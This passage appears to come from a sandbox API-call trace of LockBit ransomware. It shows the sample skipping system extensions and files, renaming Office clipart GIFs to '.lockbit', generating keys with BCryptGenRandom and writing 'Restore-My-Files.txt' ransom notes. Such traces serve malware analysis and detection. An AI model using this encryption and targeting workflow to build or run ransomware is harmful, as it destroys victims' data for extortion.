lpString2=".GIF") returned -1 [0180.929] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.929] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.929] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01746_.GIF.lockbit") returned 72 [0180.930] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01746_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01746_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0180.935] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.935] malloc (_Size=0x40068) returned 0x3df0008 [0180.935] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=738) returned 1 [0180.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.937] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.937] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0180.939] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01746_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01746_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.939] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.939] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.941] free (_Block=0x1fa2ed8) [0180.941] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01746_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.941] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.941] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c37800, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x5e59b110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x34c37800, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01747_.GIF", cAlternateFileName="")) returned 1 [0180.941] lstrcmpiW (lpString1=".", lpString2="WB01747_.GIF") returned -1 [0180.941] lstrcmpiW (lpString1="..", lpString2="WB01747_.GIF") returned -1 [0180.941] PathFindExtensionW (pszPath="WB01747_.GIF") returned=".GIF" [0180.941] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.941] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.941] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.941] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.942] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.942] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.943] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.943] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.943] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01747_.GIF") returned -1 [0180.943] lstrcmpiW (lpString1="ntldr", lpString2="WB01747_.GIF") returned -1 [0180.943] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01747_.GIF") returned -1 [0180.943] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01747_.GIF") returned -1 [0180.944] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01747_.GIF") returned -1 [0180.944] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01747_.GIF") returned -1 [0180.944] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01747_.GIF") returned -1 [0180.944] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.944] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01747_.GIF") returned=".GIF" [0180.944] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.944] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.944] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.944] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.944] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.945] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.945] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01747_.GIF.lockbit") returned 72 [0180.945] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01747_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01747_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.947] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.947] malloc (_Size=0x40068) returned 0x1ff1e60 [0180.947] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=903) returned 1 [0180.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0180.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0180.948] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0180.954] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01747_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01747_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.954] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.954] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.955] free (_Block=0x1fa2ed8) [0180.955] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01747_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.956] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.956] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.956] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d9c6a00, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x70875130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2d9c6a00, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01748_.GIF", cAlternateFileName="")) returned 1 [0180.956] lstrcmpiW (lpString1=".", lpString2="WB01748_.GIF") returned -1 [0180.956] lstrcmpiW (lpString1="..", lpString2="WB01748_.GIF") returned -1 [0180.956] PathFindExtensionW (pszPath="WB01748_.GIF") returned=".GIF" [0180.956] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.956] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.956] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.956] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.956] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.956] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.956] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.956] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.956] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.956] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.956] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.956] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.957] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.957] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.957] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.957] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.957] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.957] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.957] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.958] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.958] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01748_.GIF") returned -1 [0180.958] lstrcmpiW (lpString1="ntldr", lpString2="WB01748_.GIF") returned -1 [0180.958] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01748_.GIF") returned -1 [0180.958] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01748_.GIF") returned -1 [0180.958] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01748_.GIF") returned -1 [0180.958] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01748_.GIF") returned -1 [0180.958] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01748_.GIF") returned -1 [0180.958] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.958] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01748_.GIF") returned=".GIF" [0180.959] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.959] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.959] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.960] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.960] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.960] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.960] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.960] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.960] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01748_.GIF.lockbit") returned 72 [0180.960] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01748_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01748_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0180.969] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.969] malloc (_Size=0x40068) returned 0x3df0008 [0180.969] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=727) returned 1 [0180.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0180.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0180.970] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0181.001] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01748_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01748_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0181.001] malloc (_Size=0xa6) returned 0x1fa2ed8 [0181.001] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0181.001] free (_Block=0x1fa2ed8) [0181.001] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01748_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0181.001] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0181.001] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0181.001] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d7b600, ftCreationTime.dwHighDateTime=0x1bd4e69, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x28d7b600, ftLastWriteTime.dwHighDateTime=0x1bd4e69, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01749_.GIF", cAlternateFileName="")) returned 1 [0181.001] lstrcmpiW (lpString1=".", lpString2="WB01749_.GIF") returned -1 [0181.002] lstrcmpiW (lpString1="..", lpString2="WB01749_.GIF") returned -1 [0181.002] PathFindExtensionW (pszPath="WB01749_.GIF") returned=".GIF" [0181.002] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0181.002] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0181.002] lstrcmpiW (lpString1=".icns", lpString2=".GIF") 